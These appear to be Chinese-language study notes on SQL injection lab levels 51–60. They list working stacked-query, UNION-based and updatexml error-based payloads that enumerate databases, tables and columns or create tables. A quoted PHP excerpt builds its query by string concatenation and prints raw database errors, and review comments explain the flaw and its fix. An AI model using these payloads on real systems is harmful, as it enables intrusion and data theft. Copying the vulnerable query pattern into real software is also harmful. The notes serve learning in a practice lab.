51
堆叠注入
payload:?sort=1%27;%20create%20table%20test51%20like%20users--+
52
堆叠注入
payload:?sort=username;%20create%20table%20test52%20like%20users;
53
堆叠注入
payload:?sort=1%27;%20create%20table%20test53%20like%20users;--+
54
?id=-1%27%20union%20select%201,database(),%273 //查库
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 //查表
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='' //查列
?id=-1' union select 1,group_concat(secret_**),3 from ___%23 //查数据
55
payload:?id=1)
56
payload:?id=1')
57
payload:?id=1"
58
页面好像不会回显 union 查询出的数据,所以改用报错注入。
payload:?id=-1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+
// Excerpt of the lesson 58 page logic: look up one user row by id and print a name/password pair.
// $id is interpolated into the SQL text inside single quotes, so the query is built by string
// concatenation rather than with bound parameters.
// NOTE(review): where $id comes from is outside this excerpt; the payload above suggests it is
// the ?id= request parameter, with no escaping visible here. Confirm against the full file.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
// The values shown to the user come from this hard-coded list and its reverse, not from the
// columns of the fetched row. Only $row['id'] is used, as an array index, so extra columns
// produced by a UNION are never echoed back.
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// The raw database error text is written into the response. This is the output channel that
// error-based extraction depends on. Hardening: log the error server-side and show a generic
// message, and replace the string-built query with a prepared statement (mysqli or PDO).
print_r(mysql_error());
echo "</font>";
}
这段代码并没有直接输出结果集中的数据,而是新建了一个固定数组,只用结果集中的 id 作为下标从该数组里取值后输出,所以 union 查询到的数据不会回显;而查询出错时 mysql_error() 的内容会直接打印到页面,因此报错注入可以带出数据。
59
payload:?id=-1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+
60
payload:?id=-2") and (updatexml(1,concat(0x7e,(select database()),0x7e),1))--+